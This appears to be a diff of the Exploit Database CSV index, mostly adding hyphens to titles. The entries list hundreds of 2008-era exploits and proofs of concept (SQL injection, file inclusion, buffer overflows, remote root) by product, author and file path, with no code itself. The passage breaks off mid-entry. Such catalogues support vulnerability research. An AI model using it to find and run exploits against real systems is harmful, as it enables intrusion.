-5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0 +5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - (cid) SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0 5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir (id) Remote SQL Injection",2008-02-21,S@BUN,php,webapps,0 5170,platforms/php/webapps/5170.txt,"BeContent 031 - (id) Remote SQL Injection",2008-02-21,Cr@zy_King,php,webapps,0 5171,platforms/php/webapps/5171.txt,"ossim 0.9.9rc5 - (XSS/SQL Injection) Multiple Vulnerabilities",2008-02-21,"Marcin Kopec",php,webapps,0 -5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 (id_catg) SQL Injection",2008-02-21,DamaR,php,webapps,0 +5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - (id_catg) SQL Injection",2008-02-21,DamaR,php,webapps,0 5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusion Vulnerabilities",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c Remote File Inclusion Vulnerabilities",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5175,platforms/php/webapps/5175.txt,"phpProfiles 4.5.2 BETA - (body_comm.inc.php) RFI",2008-02-23,CraCkEr,php,webapps,0 @@ -4821,10 +4821,10 @@ id,file,description,date,author,platform,type,port 5181,platforms/php/webapps/5181.txt,"pigyard art gallery - Multiple Vulnerabilities",2008-02-24,ZoRLu,php,webapps,0 5182,platforms/php/webapps/5182.txt,"Portail Web Php <= 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps,0 5183,platforms/php/webapps/5183.txt,"php Download Manager <= 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,php,webapps,0 -5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 (204 No Content) error Remote Denial of Service Exploit",2008-02-25,shinnai,windows,dos,0 +5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - (204 No Content) error Remote Denial of Service Exploit",2008-02-25,shinnai,windows,dos,0 5185,platforms/asp/webapps/5185.txt,"PORAR WEBBOARD (question.asp) Remote SQL Injection",2008-02-25,xcorpitx,asp,webapps,0 5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari (artid) SQL Injection",2008-02-25,xcorpitx,php,webapps,0 -5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 (members.asp uid) Remote SQL Injection",2008-02-25,S@BUN,asp,webapps,0 +5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - (members.asp uid) Remote SQL Injection",2008-02-25,S@BUN,asp,webapps,0 5188,platforms/windows/remote/5188.html,"Rising Antivirus Online Scanner Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 5189,platforms/php/webapps/5189.pl,"DBHcms <= 1.1.4 - Remote File Inclusion Exploit",2008-02-25,Iron,php,webapps,0 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control BoF Exploit",2008-02-26,Elazar,windows,remote,0 @@ -4832,44 +4832,44 @@ id,file,description,date,author,platform,type,port 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) BoF Exploit",2008-02-26,rgod,windows,remote,0 5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - (RFI/XSS/RCE) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 -5195,platforms/php/webapps/5195.txt,"Mambo Component Simpleboard 1.0.3 (catid) SQL Injection",2008-02-27,"it's my",php,webapps,0 -5196,platforms/php/webapps/5196.pl,"EazyPortal <= 1.0 (COOKIE) Remote SQL Injection Exploit",2008-02-27,Iron,php,webapps,0 -5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 (head_auth.php) Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0 -5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 (categ) Remote SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 +5195,platforms/php/webapps/5195.txt,"Mambo Component Simpleboard 1.0.3 - (catid) SQL Injection",2008-02-27,"it's my",php,webapps,0 +5196,platforms/php/webapps/5196.pl,"EazyPortal <= 1.0 - (COOKIE) Remote SQL Injection Exploit",2008-02-27,Iron,php,webapps,0 +5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 - (head_auth.php) Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0 +5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 - (categ) Remote SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusion Vulnerabilities",2008-02-28,MhZ91,php,webapps,0 5200,platforms/php/webapps/5200.txt,"Podcast Generator <= 1.0 BETA 2 - RFI / File Disclosure Vulnerabilities",2008-02-28,GoLd_M,php,webapps,0 5201,platforms/windows/dos/5201.txt,"Crysis <= 1.1.1.5879 - Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 5202,platforms/php/webapps/5202.txt,"barryvan compo manager 0.5pre-1 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery <= 2.7.9 - Remote SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0 -5204,platforms/php/webapps/5204.py,"Centreon <= 1.4.2.3 (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 +5204,platforms/php/webapps/5204.py,"Centreon <= 1.4.2.3 - (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control (PVCalendar.ocx) BoF Exploit",2008-02-29,Elazar,windows,remote,0 5206,platforms/php/webapps/5206.txt,"Koobi CMS 4.3.0 - 4.2.3 (categ) Remote SQL Injection",2008-02-29,JosS,php,webapps,0 5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica (id) Remote SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 -5208,platforms/php/webapps/5208.txt,"phpArcadeScript <= 3.0RC2 (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 -5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 (mod_project_id) Remote SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 -5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) DoS Exploit",2008-03-01,0in,linux,dos,0 -5211,platforms/php/webapps/5211.txt,"Dynamic photo gallery 1.02 (albumID) Remote SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5208,platforms/php/webapps/5208.txt,"phpArcadeScript <= 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 +5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) Remote SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 +5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) DoS Exploit",2008-03-01,0in,linux,dos,0 +5211,platforms/php/webapps/5211.txt,"Dynamic photo gallery 1.02 - (albumID) Remote SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 5212,platforms/windows/remote/5212.py,"MiniWebSvr 0.0.9a Remote Directory Transversal",2008-03-03,gbr,windows,remote,0 5213,platforms/windows/remote/5213.txt,"Versant Object Database <= 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart Remote SQL Injection",2008-03-04,bius,php,webapps,0 -5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 -5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 (sid) Remote SQL Injection",2008-03-06,S@BUN,php,webapps,0 +5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 +5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - (sid) Remote SQL Injection",2008-03-06,S@BUN,php,webapps,0 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service Exploit",2008-03-06,spdr,windows,dos,0 5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads (cid) Remote SQL Injection",2008-03-06,S@BUN,php,webapps,0 5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin Exploit",2008-03-07,"Charles Fol",php,webapps,0 5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Remote Upload Exploit",2008-03-07,"Charles Fol",php,webapps,0 -5221,platforms/php/webapps/5221.txt,"Joomla Component Candle 1.0 (cID) SQL Injection",2008-03-08,S@BUN,php,webapps,0 -5222,platforms/php/webapps/5222.txt,"QuickTicket <= 1.5 (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0 +5221,platforms/php/webapps/5221.txt,"Joomla Component Candle 1.0 - (cID) SQL Injection",2008-03-08,S@BUN,php,webapps,0 +5222,platforms/php/webapps/5222.txt,"QuickTicket <= 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0 5223,platforms/php/webapps/5223.txt,"BM Classifieds <= 20080409 - Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 -5224,platforms/linux/remote/5224.php,"VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 +5224,platforms/linux/remote/5224.php,"VHCS <= 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 5225,platforms/windows/dos/5225.html,"KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow PoC",2008-03-10,void,windows,dos,0 -5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 (cat) SQL Injection",2008-03-10,Don,php,webapps,0 +5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0 5227,platforms/solaris/local/5227.c,"Solaris 8/9/10 - fifofs I_PEEK Local Kernel Memory Leak Exploit",2008-03-10,"Marco Ivaldi",solaris,local,0 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / null pointer Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,remote,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry <= 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 5230,platforms/windows/remote/5230.txt,"argon client management services <= 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0 -5231,platforms/php/webapps/5231.php,"phpMyNewsletter <= 0.8b5 (archives.php msg_id) SQL Injection Exploit",2008-03-10,"Charles Fol",php,webapps,0 -5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0 +5231,platforms/php/webapps/5231.php,"phpMyNewsletter <= 0.8b5 - (archives.php msg_id) SQL Injection Exploit",2008-03-10,"Charles Fol",php,webapps,0 +5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 - (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0 5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) Remote SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0 5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 - Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0 5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0 @@ -4886,22 +4886,22 @@ id,file,description,date,author,platform,type,port 5246,platforms/php/webapps/5246.txt,"easycalendar <= 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"easygallery <= 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143 -5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BoF Exploit",2008-03-14,haluznik,windows,remote,0 +5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 - (Fetch) post-auth Remote BoF Exploit",2008-03-14,haluznik,windows,remote,0 5250,platforms/windows/local/5250.cpp,"VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso <= 2.0.4.3 - (kid) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5256,platforms/php/webapps/5256.pl,"AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0 +5256,platforms/php/webapps/5256.pl,"AuraCMS <= 2.2.1 - (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC",2008-03-14,kingcope,solaris,dos,0 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 -5260,platforms/php/webapps/5260.txt,"fuzzylime CMS <= 3.01 (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 +5260,platforms/php/webapps/5260.txt,"fuzzylime CMS <= 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP <= RC3 (2.204) FIX4 - Remote SQL Injection",2008-03-16,irk4z,php,webapps,0 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote BoF Exploit",2008-03-16,h07,windows,remote,0 -5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities",2008-03-17,GoLd_M,php,webapps,0 +5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion Vulnerabilities",2008-03-17,GoLd_M,php,webapps,0 5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 - Multiple RFI Vulnerabilities",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary <= 0.94 - Remote SQL Injection",2008-03-17,S@BUN,php,webapps,0 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win)",2008-03-17,"Georgi Guninski",multiple,dos,0 @@ -4909,12 +4909,12 @@ id,file,description,date,author,platform,type,port 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service Exploit",2008-03-17,0in,windows,dos,0 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice (album.asp) Remote SQL Injection Exploit",2008-03-18,JosS,asp,webapps,0 -5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 (id) Remote SQL Injection",2008-03-18,n3w7u,php,webapps,0 +5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - (id) Remote SQL Injection",2008-03-18,n3w7u,php,webapps,0 5276,platforms/asp/webapps/5276.txt,"ASPapp (links.asp CatId) Remote SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 -5277,platforms/php/webapps/5277.txt,"Joomla Component joovideo 1.2.2 (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5278,platforms/php/webapps/5278.txt,"Joomla Component Alberghi <= 2.1.3 (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5277,platforms/php/webapps/5277.txt,"Joomla Component joovideo 1.2.2 - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5278,platforms/php/webapps/5278.txt,"Joomla Component Alberghi <= 2.1.3 - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5280,platforms/php/webapps/5280.txt,"Joomla Component Restaurante 1.0 (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5280,platforms/php/webapps/5280.txt,"Joomla Component Restaurante 1.0 - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 5281,platforms/php/webapps/5281.php,"PEEL CMS Admin Hash Extraction and Remote Upload Exploit",2008-03-19,"Charles Fol",php,webapps,0 5282,platforms/solaris/remote/5282.txt,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 5283,platforms/linux/remote/5283.txt,"CenterIM <= 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 @@ -4923,36 +4923,36 @@ id,file,description,date,author,platform,type,port 5287,platforms/windows/local/5287.txt,"Microsoft Office Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion Vulnerabilities",2008-03-21,0x90,php,webapps,0 5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 -5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 (cid) Remote SQL Injection",2008-03-21,S@BUN,php,webapps,0 +5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - (cid) Remote SQL Injection",2008-03-21,S@BUN,php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds (cat_id) Remote SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke <= 0.764 - Blind SQL Injection Exploit",2008-03-21,The:Paradox,php,webapps,0 -5293,platforms/php/webapps/5293.pl,"XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit",2008-03-21,cOndemned,php,webapps,0 +5293,platforms/php/webapps/5293.pl,"XLPortal <= 2.2.4 - (search) Remote SQL Injection Exploit",2008-03-21,cOndemned,php,webapps,0 5294,platforms/php/webapps/5294.txt,"joomla components custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps,0 -5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit",2008-03-22,Inphex,php,webapps,0 -5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 (login.php) Local File Inclusion",2008-03-22,KnocKout,php,webapps,0 -5297,platforms/php/webapps/5297.txt,"Joomla Component rekry 1.0.0 (op_id) SQL Injection",2008-03-23,Sniper456,php,webapps,0 +5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - (dynamic_titles.php) SQL Injection Exploit",2008-03-22,Inphex,php,webapps,0 +5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - (login.php) Local File Inclusion",2008-03-22,KnocKout,php,webapps,0 +5297,platforms/php/webapps/5297.txt,"Joomla Component rekry 1.0.0 - (op_id) SQL Injection",2008-03-23,Sniper456,php,webapps,0 5298,platforms/php/webapps/5298.py,"destar 0.2.2-5 - Arbitrary Add New User Exploit",2008-03-23,nonroot,php,webapps,0 5299,platforms/php/webapps/5299.txt,"Joomla Component d3000 1.0.0 - Remote SQL Injection",2008-03-23,S@BUN,php,webapps,0 5300,platforms/php/webapps/5300.txt,"Joomla Component Cinema 1.0 - Remote SQL Injection",2008-03-23,S@BUN,php,webapps,0 5301,platforms/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion",2008-03-24,bd0rk,php,webapps,0 -5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 (index.php page) Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 +5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 - (index.php page) Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusion Vulnerabilities",2008-03-24,DSecRG,php,webapps,0 5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop (his-webshop.pl t) Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps,0 5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 - Arbitrary Add Admin User Exploit",2008-03-24,nonroot,php,webapps,0 -5306,platforms/multiple/dos/5306.txt,"snircd <= 1.3.4 (send_user_mode) Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 +5306,platforms/multiple/dos/5306.txt,"snircd <= 1.3.4 - (send_user_mode) Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 5307,platforms/linux/dos/5307.pl,"MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC",2008-03-25,"Guido Landi",linux,dos,0 5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",php,webapps,0 5309,platforms/php/webapps/5309.txt,"BolinOS 4.6.1 - (LFI/XSS) Multiple Security Vulnerabilities",2008-03-25,DSecRG,php,webapps,0 -5310,platforms/php/webapps/5310.txt,"Joomla Component alphacontent <= 2.5.8 (id) SQL Injection",2008-03-25,cO2,php,webapps,0 +5310,platforms/php/webapps/5310.txt,"Joomla Component alphacontent <= 2.5.8 - (id) SQL Injection",2008-03-25,cO2,php,webapps,0 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection",2008-03-25,girex,php,webapps,0 -5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 (mod.php) Local File Inclusion",2008-03-25,girex,php,webapps,0 +5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - (mod.php) Local File Inclusion",2008-03-25,girex,php,webapps,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow Exploit (0Day)",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0Day)",2008-03-26,muts,windows,remote,69 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0 5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0 -5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection",2008-03-28,parad0x,php,webapps,0 -5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0 +5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 - (album) SQL Injection",2008-03-28,parad0x,php,webapps,0 +5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow Exploit (MS08-016)",2008-03-30,Marsu,windows,local,0 5321,platforms/windows/dos/5321.txt,"Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS",2008-03-30,Marsu,windows,dos,0 5322,platforms/php/webapps/5322.txt,"Smoothflash (admin_view_image.php cid) SQL Injection",2008-03-30,S@BUN,php,webapps,0 @@ -4964,13 +4964,13 @@ id,file,description,date,author,platform,type,port 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection",2008-03-31,anonymous,php,webapps,0 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (Win32)",2008-03-31,Heretic2,windows,remote,80 -5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 (articleId) Remote SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 +5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - (articleId) Remote SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 5332,platforms/windows/remote/5332.html,"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 -5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop <= 1.51 (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 +5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop <= 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 Password Retrieve Remote SQL Injection Exploit",2008-04-01,girex,php,webapps,0 -5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 (id) SQL Injection",2008-04-01,Stack,php,webapps,0 +5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 - (id) SQL Injection",2008-04-01,Stack,php,webapps,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite Exploit",2008-04-01,shinnai,windows,remote,0 5339,platforms/php/webapps/5339.php,"Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection",2008-04-01,DreamTurk,php,webapps,0 @@ -4980,9 +4980,9 @@ id,file,description,date,author,platform,type,port 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 - RFI",2008-04-02,NoGe,php,webapps,0 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0 -5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0 +5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0 5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 -5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC",2008-04-03,shinnai,windows,dos,0 +5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow PoC",2008-04-03,shinnai,windows,dos,0 5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie (id_gal) Remote SQL Injection",2008-04-03,S@BUN,php,webapps,0 5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives (id) Remote SQL Injection",2008-04-03,S@BUN,php,webapps,0 5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - Remote SQL Injection",2008-04-03,Houssamix,php,webapps,0 @@ -4991,27 +4991,27 @@ id,file,description,date,author,platform,type,port 5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - (pkgadd) Local Root Exploit",2008-04-04,qaaz,sco,local,0 5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA - Local Root 